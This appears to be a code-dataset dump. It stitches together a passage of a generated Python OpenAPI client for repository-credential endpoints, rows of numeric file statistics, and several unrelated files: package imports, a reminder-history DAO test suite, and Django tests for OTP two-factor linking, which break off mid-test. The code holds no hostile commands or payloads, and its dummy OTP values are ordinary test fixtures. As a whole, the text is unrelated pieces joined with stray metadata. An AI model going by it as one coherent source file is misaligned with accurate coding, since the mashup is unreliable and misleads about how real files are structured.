auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repocreds', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1RepoCreds', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_repository_credentials(self, url, **kwargs): # noqa: E501
"""DeleteRepositoryCredentials deletes a repository credential set from the configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_repository_credentials(url, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str url: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_repository_credentials_with_http_info(url, **kwargs) # noqa: E501
def delete_repository_credentials_with_http_info(self, url, **kwargs): # noqa: E501
"""DeleteRepositoryCredentials deletes a repository credential set from the configuration # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_repository_credentials_with_http_info(url, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str url: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(object, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'url'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_repository_credentials" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'url' is set
if self.api_client.client_side_validation and ('url' not in local_var_params or # noqa: E501
local_var_params['url'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `url` when calling `delete_repository_credentials`") # noqa: E501
collection_formats = {}
path_params = {}
if 'url' in local_var_params:
path_params['url'] = local_var_params['url'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repocreds/{url}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_repository_credentials(self, **kwargs): # noqa: E501
"""ListRepositoryCredentials gets a list of all configured repository credential sets # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_repository_credentials(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str url: Repo URL for query.
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1alpha1RepoCredsList
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_repository_credentials_with_http_info(**kwargs) # noqa: E501
def list_repository_credentials_with_http_info(self, **kwargs): # noqa: E501
"""ListRepositoryCredentials gets a list of all configured repository credential sets # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_repository_credentials_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str url: Repo URL for query.
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1alpha1RepoCredsList, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'url'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_repository_credentials" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'url' in local_var_params and local_var_params['url'] is not None: # noqa: E501
query_params.append(('url', local_var_params['url'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repocreds', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1RepoCredsList', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def update_repository_credentials(self, creds_url, body, **kwargs): # noqa: E501
"""UpdateRepositoryCredentials updates a repository credential set # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_repository_credentials(creds_url, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str creds_url: URL is the URL that this credentials matches to (required)
:param V1alpha1RepoCreds body: (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: V1alpha1RepoCreds
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.update_repository_credentials_with_http_info(creds_url, body, **kwargs) # noqa: E501
def update_repository_credentials_with_http_info(self, creds_url, body, **kwargs): # noqa: E501
"""UpdateRepositoryCredentials updates a repository credential set # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_repository_credentials_with_http_info(creds_url, body, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str creds_url: URL is the URL that this credentials matches to (required)
:param V1alpha1RepoCreds body: (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(V1alpha1RepoCreds, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [
'creds_url',
'body'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method update_repository_credentials" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'creds_url' is set
if self.api_client.client_side_validation and ('creds_url' not in local_var_params or # noqa: E501
local_var_params['creds_url'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `creds_url` when calling `update_repository_credentials`") # noqa: E501
# verify the required parameter 'body' is set
if self.api_client.client_side_validation and ('body' not in local_var_params or # noqa: E501
local_var_params['body'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `body` when calling `update_repository_credentials`") # noqa: E501
collection_formats = {}
path_params = {}
if 'creds_url' in local_var_params:
path_params['creds.url'] = local_var_params['creds_url'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in local_var_params:
body_params = local_var_params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/api/v1/repocreds/{creds.url}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1RepoCreds', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
| 43.501002
| 136
| 0.597227
| 2,327
| 21,707
| 5.323593
| 0.084658
| 0.038101
| 0.057636
| 0.02906
| 0.927107
| 0.920972
| 0.900872
| 0.877381
| 0.872861
| 0.858411
| 0
| 0.015041
| 0.332289
| 21,707
| 498
| 137
| 43.588353
| 0.839658
| 0.4546
| 0
| 0.70339
| 1
| 0
| 0.16356
| 0.054679
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038136
| false
| 0
| 0.021186
| 0
| 0.097458
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
77b0ceffdda28b89735a6359cb183588966ab8ae
| 123
|
py
|
Python
|
tensorlayer/app/__init__.py
|
dalonsoa/tensorlayer
|
066c09be1eea1b49914b2a6e806329a599edce58
|
[
"Apache-2.0"
] | null | null | null |
tensorlayer/app/__init__.py
|
dalonsoa/tensorlayer
|
066c09be1eea1b49914b2a6e806329a599edce58
|
[
"Apache-2.0"
] | null | null | null |
tensorlayer/app/__init__.py
|
dalonsoa/tensorlayer
|
066c09be1eea1b49914b2a6e806329a599edce58
|
[
"Apache-2.0"
] | null | null | null |
#! /usr/bin/python
# -*- coding: utf-8 -*-
from .computer_vision_object_detection import *
from .computer_vision import *
| 20.5
| 47
| 0.723577
| 16
| 123
| 5.3125
| 0.75
| 0.282353
| 0.423529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009346
| 0.130081
| 123
| 5
| 48
| 24.6
| 0.785047
| 0.317073
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
77b79be30d259e24c757639448b1322cb1c40629
| 50
|
py
|
Python
|
excel_importer/api.py
|
africlouds/excel_importer
|
7452a49b3703ee57d4e8b1cfeab57c76a26ff8c9
|
[
"MIT"
] | null | null | null |
excel_importer/api.py
|
africlouds/excel_importer
|
7452a49b3703ee57d4e8b1cfeab57c76a26ff8c9
|
[
"MIT"
] | null | null | null |
excel_importer/api.py
|
africlouds/excel_importer
|
7452a49b3703ee57d4e8b1cfeab57c76a26ff8c9
|
[
"MIT"
] | null | null | null |
import frappe
def import_excel_file():
pass
| 8.333333
| 24
| 0.72
| 7
| 50
| 4.857143
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.22
| 50
| 5
| 25
| 10
| 0.871795
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0.333333
| 0.666667
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
ae0004ac3c91546591c5faa7e4361a6bfea87db3
| 139
|
py
|
Python
|
client/gefyra/api/__init__.py
|
gefyrahq/gefyra
|
0bc205b4b01100c640081ead671bdb195761299b
|
[
"Apache-2.0"
] | 41
|
2022-03-24T15:45:56.000Z
|
2022-03-31T08:07:19.000Z
|
client/gefyra/api/__init__.py
|
SteinRobert/gefyra
|
9f7076d518ef7a543ee9a6607cc1a1a6964d5807
|
[
"Apache-2.0"
] | 23
|
2021-12-02T10:29:09.000Z
|
2022-03-17T18:10:57.000Z
|
client/gefyra/api/__init__.py
|
SteinRobert/gefyra
|
9f7076d518ef7a543ee9a6607cc1a1a6964d5807
|
[
"Apache-2.0"
] | 3
|
2022-02-18T21:16:10.000Z
|
2022-03-09T22:46:28.000Z
|
from .bridge import * # noqa
from .down import * # noqa
from .up import * # noqa
from .list import * # noqa
from .run import * # noqa
| 23.166667
| 29
| 0.640288
| 20
| 139
| 4.45
| 0.4
| 0.561798
| 0.629213
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.251799
| 139
| 5
| 30
| 27.8
| 0.855769
| 0.172662
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7adc34e5afa8e4bc0e0fd78343c4e204bc5b2449
| 81
|
py
|
Python
|
shrimpy/__init__.py
|
cwm9cwm9/shrimpy-python
|
8edabbf1c06a29e73d9bf0a30db82bf48d9ef2a5
|
[
"MIT"
] | 128
|
2019-07-10T06:31:54.000Z
|
2022-03-06T04:25:39.000Z
|
shrimpy/__init__.py
|
johnjdailey/shrimpy-python
|
10a942b14dd88102564460d60c25cc10123fc448
|
[
"MIT"
] | 16
|
2020-04-29T12:31:18.000Z
|
2021-12-03T03:33:31.000Z
|
shrimpy/__init__.py
|
johnjdailey/shrimpy-python
|
10a942b14dd88102564460d60c25cc10123fc448
|
[
"MIT"
] | 41
|
2019-10-29T20:51:22.000Z
|
2022-03-14T03:44:11.000Z
|
from shrimpy.shrimpy_api_client import *
from shrimpy.shrimpy_ws_client import *
| 27
| 40
| 0.851852
| 12
| 81
| 5.416667
| 0.5
| 0.338462
| 0.553846
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.098765
| 81
| 2
| 41
| 40.5
| 0.890411
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
bb561d559c689a527df4359e7e4751e27a070b34
| 3,625
|
py
|
Python
|
src/tests/dao_test/unverified_reminder_history_dao_test.py
|
Veloxization/likahbot
|
24e22711f514fc0878cf6fb9e516ad44425ea6a7
|
[
"MIT"
] | null | null | null |
src/tests/dao_test/unverified_reminder_history_dao_test.py
|
Veloxization/likahbot
|
24e22711f514fc0878cf6fb9e516ad44425ea6a7
|
[
"MIT"
] | null | null | null |
src/tests/dao_test/unverified_reminder_history_dao_test.py
|
Veloxization/likahbot
|
24e22711f514fc0878cf6fb9e516ad44425ea6a7
|
[
"MIT"
] | null | null | null |
import unittest
import os
from dao.unverified_reminder_history_dao import UnverifiedReminderHistoryDAO
from dao.unverified_reminder_messages_dao import UnverifiedReminderMessagesDAO
class TestUnverifiedReminderHistoryDAO(unittest.TestCase):
def setUp(self):
self.db_addr = "database/test_db.db"
os.popen(f"sqlite3 {self.db_addr} < database/schema.sql")
self.unverified_reminder_history_dao = UnverifiedReminderHistoryDAO(self.db_addr)
self.unverified_reminder_messages_dao = UnverifiedReminderMessagesDAO(self.db_addr)
self.unverified_reminder_messages_dao.add_guild_unverified_reminder_message(1234, "Test", 0)
self.message_id = self.unverified_reminder_messages_dao.get_guild_unverified_reminder_messages(1234)[0]["id"]
self.unverified_reminder_messages_dao.add_guild_unverified_reminder_message(2345, "Test", 0)
self.message_id2 = self.unverified_reminder_messages_dao.get_guild_unverified_reminder_messages(2345)[0]["id"]
def tearDown(self):
self.unverified_reminder_history_dao.clear_unverified_reminder_history_table()
self.unverified_reminder_messages_dao.clear_unverified_reminder_messages_table()
def test_member_reminder_history_is_added_to_correctly(self):
reminder_history = self.unverified_reminder_history_dao.get_member_reminder_history(9876, 1234)
self.assertEqual(len(reminder_history), 0)
self.unverified_reminder_history_dao.add_to_member_reminder_history(9876, self.message_id)
reminder_history = self.unverified_reminder_history_dao.get_member_reminder_history(9876, 1234)
self.assertEqual(len(reminder_history), 1)
def test_member_reminder_history_is_deleted_correctly(self):
self.unverified_reminder_history_dao.add_to_member_reminder_history(9876, self.message_id)
self.unverified_reminder_history_dao.add_to_member_reminder_history(8765, self.message_id)
reminder_history1 = self.unverified_reminder_history_dao.get_member_reminder_history(9876, 1234)
reminder_history2 = self.unverified_reminder_history_dao.get_member_reminder_history(8765, 1234)
self.assertEqual(len(reminder_history1), 1)
self.assertEqual(len(reminder_history2), 1)
self.unverified_reminder_history_dao.delete_member_reminder_history(9876, 1234)
reminder_history1 = self.unverified_reminder_history_dao.get_member_reminder_history(9876, 1234)
reminder_history2 = self.unverified_reminder_history_dao.get_member_reminder_history(8765, 1234)
self.assertEqual(len(reminder_history1), 0)
self.assertEqual(len(reminder_history2), 1)
def test_guild_reminder_history_is_deleted_correctly(self):
self.unverified_reminder_history_dao.add_to_member_reminder_history(9876, self.message_id)
self.unverified_reminder_history_dao.add_to_member_reminder_history(9876, self.message_id2)
reminder_history1 = self.unverified_reminder_history_dao.get_member_reminder_history(9876, 1234)
reminder_history2 = self.unverified_reminder_history_dao.get_member_reminder_history(9876, 2345)
self.assertEqual(len(reminder_history1), 1)
self.assertEqual(len(reminder_history2), 1)
self.unverified_reminder_history_dao.delete_guild_reminder_history(1234)
reminder_history1 = self.unverified_reminder_history_dao.get_member_reminder_history(9876, 1234)
reminder_history2 = self.unverified_reminder_history_dao.get_member_reminder_history(9876, 2345)
self.assertEqual(len(reminder_history1), 0)
self.assertEqual(len(reminder_history2), 1)
| 68.396226
| 118
| 0.806897
| 452
| 3,625
| 6.002212
| 0.115044
| 0.248802
| 0.202728
| 0.206414
| 0.796535
| 0.772576
| 0.728714
| 0.728714
| 0.709178
| 0.709178
| 0
| 0.050629
| 0.122759
| 3,625
| 52
| 119
| 69.711538
| 0.802516
| 0
| 0
| 0.446809
| 0
| 0
| 0.02069
| 0
| 0
| 0
| 0
| 0
| 0.212766
| 1
| 0.106383
| false
| 0
| 0.085106
| 0
| 0.212766
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2475c6d1ccbe772c3014da01ad59344b9dd00b2d
| 12,911
|
py
|
Python
|
Functie/test_2fa.py
|
RamonvdW/nhb-apps
|
5a9f840bfe066cd964174515c06b806a7b170c69
|
[
"BSD-3-Clause-Clear"
] | 1
|
2021-12-22T13:11:12.000Z
|
2021-12-22T13:11:12.000Z
|
Functie/test_2fa.py
|
RamonvdW/nhb-apps
|
5a9f840bfe066cd964174515c06b806a7b170c69
|
[
"BSD-3-Clause-Clear"
] | 9
|
2020-10-28T07:07:05.000Z
|
2021-06-28T20:05:37.000Z
|
Functie/test_2fa.py
|
RamonvdW/nhb-apps
|
5a9f840bfe066cd964174515c06b806a7b170c69
|
[
"BSD-3-Clause-Clear"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2019-2021 Ramon van der Winkel.
# All rights reserved.
# Licensed under BSD-3-Clause-Clear. See LICENSE file for details.
from django.test import TestCase
from Account.models import Account
from TestHelpers.e2ehelpers import E2EHelpers
from TestHelpers import testdata
import pyotp
def get_otp_code(account):
otp = pyotp.TOTP(account.otp_code)
return otp.now()
class TestFunctie2FA(E2EHelpers, TestCase):
""" unit tests voor de Functie applicatie, module OTP / 2FA """
test_after = ('Account', 'Functie.test_rol')
url_koppel_stap1 = '/functie/otp-koppelen-stap1/'
url_koppel_stap2 = '/functie/otp-koppelen-stap2/'
url_koppel_stap3 = '/functie/otp-koppelen-stap3/'
url_controle = '/functie/otp-controle/'
@classmethod
def setUpTestData(cls):
cls.testdata = testdata.TestData()
cls.testdata.maak_accounts()
def setUp(self):
""" initialisatie van de test case """
self.account_normaal = self.e2e_create_account('normaal', 'normaal@test.com', 'Normaal')
self.testdata.account_admin.otp_code = ""
self.testdata.account_admin.otp_is_actief = False
self.testdata.account_admin.save()
self.account_normaal.otp_code = ""
self.account_normaal.otp_is_actief = False
self.account_normaal.save()
def test_2fa_koppelen_niet_ingelogd(self):
self.e2e_logout()
# controleer redirect naar het plein, omdat de gebruiker niet ingelogd is
with self.assert_max_queries(20):
resp = self.client.get(self.url_koppel_stap1)
self.assert_is_redirect(resp, '/plein/')
with self.assert_max_queries(20):
resp = self.client.get(self.url_koppel_stap2)
self.assert_is_redirect(resp, '/plein/')
with self.assert_max_queries(20):
resp = self.client.get(self.url_koppel_stap3)
self.assert_is_redirect(resp, '/plein/')
with self.assert_max_queries(20):
resp = self.client.post(self.url_koppel_stap3, {'otp_code': '123456'})
self.assert_is_redirect(resp, '/plein/')
def test_2fa_koppelen_niet_nodig(self):
self.e2e_login(self.account_normaal)
# controleer redirect naar het plein, omdat OTP koppeling niet nodig is
with self.assert_max_queries(20):
resp = self.client.get(self.url_koppel_stap1)
self.assert403(resp)
with self.assert_max_queries(20):
resp = self.client.get(self.url_koppel_stap2)
self.assert403(resp)
with self.assert_max_queries(20):
resp = self.client.get(self.url_koppel_stap3)
self.assert403(resp)
with self.assert_max_queries(20):
resp = self.client.post(self.url_koppel_stap3, {'otp_code': '123456'})
self.assert403(resp)
def test_2fa_koppelen(self):
# reset OTP koppeling
# log in
self.e2e_login(self.testdata.account_admin)
# check mogelijkheid tot koppelen
with self.assert_max_queries(20):
resp = self.client.get(self.url_koppel_stap1)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_template_used(resp, ('functie/otp-koppelen-stap1-uitleg.dtl', 'plein/site_layout.dtl'))
self.assert_html_ok(resp)
with self.assert_max_queries(20):
resp = self.client.get(self.url_koppel_stap2)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_template_used(resp, ('functie/otp-koppelen-stap2-scan-qr-code.dtl', 'plein/site_layout.dtl'))
self.assert_html_ok(resp)
# check dat het OTP secret aangemaakt is
self.testdata.account_admin = Account.objects.get(username='admin')
self.assertNotEqual(self.testdata.account_admin.otp_code, '')
with self.assert_max_queries(20):
resp = self.client.get(self.url_koppel_stap3)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_template_used(resp, ('functie/otp-koppelen-stap3-code-invoeren.dtl', 'plein/site_layout.dtl'))
self.assert_html_ok(resp)
# geef een illegale (te korte) otp code op
with self.assert_max_queries(20):
resp = self.client.post(self.url_koppel_stap3, {'otp_code': '123'})
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_template_used(resp, ('functie/otp-koppelen-stap3-code-invoeren.dtl', 'plein/site_layout.dtl'))
self.assertNotContains(resp, 'Verkeerde code. Probeer het nog eens')
self.testdata.account_admin = Account.objects.get(username='admin')
self.assertFalse(self.testdata.account_admin.otp_is_actief)
# geef verkeerde otp code op
with self.assert_max_queries(20):
resp = self.client.post(self.url_koppel_stap3, {'otp_code': '123456'})
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_template_used(resp, ('functie/otp-koppelen-stap3-code-invoeren.dtl', 'plein/site_layout.dtl'))
self.assertContains(resp, 'Verkeerde code. Probeer het nog eens')
self.assert_html_ok(resp)
self.testdata.account_admin = Account.objects.get(username='admin')
self.assertFalse(self.testdata.account_admin.otp_is_actief)
# juiste otp code
code = get_otp_code(self.testdata.account_admin)
with self.assert_max_queries(20):
resp = self.client.post(self.url_koppel_stap3, {'otp_code': code}, follow=True)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_template_used(resp, ('functie/otp-koppelen-gelukt.dtl', 'plein/site_layout.dtl'))
self.assert_html_ok(resp)
self.testdata.account_admin = Account.objects.get(username='admin')
self.assertTrue(self.testdata.account_admin.otp_is_actief)
self.e2e_assert_other_http_commands_not_supported(self.url_koppel_stap1)
self.e2e_assert_other_http_commands_not_supported(self.url_koppel_stap2)
self.e2e_assert_other_http_commands_not_supported(self.url_koppel_stap3, post=False)
def test_2fa_koppelen_al_gekoppeld(self):
# maak OTP koppeling
self.testdata.account_admin.otp_is_actief = True
self.testdata.account_admin.otp_code = 'xx'
self.testdata.account_admin.save()
# login and pass OTP
self.e2e_login_and_pass_otp(self.testdata.account_admin)
# TODO: e2e manier vinden om te controleren dat account OTP nodig heeft
#self.assertTrue(account_needs_otp(self.account_admin))
# TODO: e2e manier vinden om te controleren dat account OTP control gehad heeft
#self.assertTrue(user_is_otp_verified(self.client))
# probeer OTP koppelen terwijl al gedaan
# post
code = get_otp_code(self.testdata.account_admin)
with self.assert_max_queries(20):
resp = self.client.post(self.url_koppel_stap3, {'otp_code': code})
self.assert_is_redirect(resp, '/plein/')
# get
with self.assert_max_queries(20):
resp = self.client.get(self.url_koppel_stap1)
self.assert_is_redirect(resp, '/plein/')
with self.assert_max_queries(20):
resp = self.client.get(self.url_koppel_stap2)
self.assert_is_redirect(resp, '/plein/')
with self.assert_max_queries(20):
resp = self.client.get(self.url_koppel_stap3)
self.assert_is_redirect(resp, '/plein/')
def test_2fa_controle_niet_ingelogd(self):
self.e2e_logout()
# controleer redirect naar het plein, omdat de gebruiker niet ingelogd is
with self.assert_max_queries(20):
resp = self.client.get(self.url_controle, follow=True)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_template_used(resp, ('plein/plein-bezoeker.dtl', 'plein/site_layout.dtl'))
with self.assert_max_queries(20):
resp = self.client.post(self.url_controle, {'otp_code': '123456'}, follow=True)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_template_used(resp, ('plein/plein-bezoeker.dtl', 'plein/site_layout.dtl'))
def test_2fa_controle_niet_nodig(self):
self.e2e_login(self.account_normaal)
# controleer redirect naar het plein, omdat OTP koppeling niet nodig is
with self.assert_max_queries(20):
resp = self.client.get(self.url_controle, follow=True)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_template_used(resp, ('plein/plein-bezoeker.dtl', 'plein/site_layout.dtl'))
with self.assert_max_queries(20):
resp = self.client.post(self.url_controle, {'otp_code': '123456'}, follow=True)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_template_used(resp, ('plein/plein-bezoeker.dtl', 'plein/site_layout.dtl'))
def test_2fa_controle(self):
self.testdata.account_admin.otp_is_actief = True
self.testdata.account_admin.otp_code = "ABCDEFGHIJKLMNOP"
self.testdata.account_admin.save()
self.e2e_login(self.testdata.account_admin)
# ophalen van de OTP controle pagina
with self.assert_max_queries(20):
resp = self.client.get(self.url_controle)
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_template_used(resp, ('functie/otp-controle.dtl', 'plein/site_layout.dtl'))
# geen code
with self.assert_max_queries(20):
resp = self.client.post(self.url_controle, {'jaja': 'nee'})
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_template_used(resp, ('functie/otp-controle.dtl', 'plein/site_layout.dtl'))
self.assertContains(resp, "De gegevens worden niet geaccepteerd")
# lege code
with self.assert_max_queries(20):
resp = self.client.post(self.url_controle, {'otp_code': ''})
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_template_used(resp, ('functie/otp-controle.dtl', 'plein/site_layout.dtl'))
self.assertContains(resp, "De gegevens worden niet geaccepteerd")
# illegale code
with self.assert_max_queries(20):
resp = self.client.post(self.url_controle, {'otp_code': 'ABCDEF'})
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_template_used(resp, ('functie/otp-controle.dtl', 'plein/site_layout.dtl'))
self.assertContains(resp, "Voer de vereiste code in")
# foute code
with self.assert_max_queries(20):
resp = self.client.post(self.url_controle, {'otp_code': '123456'})
self.assertEqual(resp.status_code, 200) # 200 = OK
self.assert_template_used(resp, ('functie/otp-controle.dtl', 'plein/site_layout.dtl'))
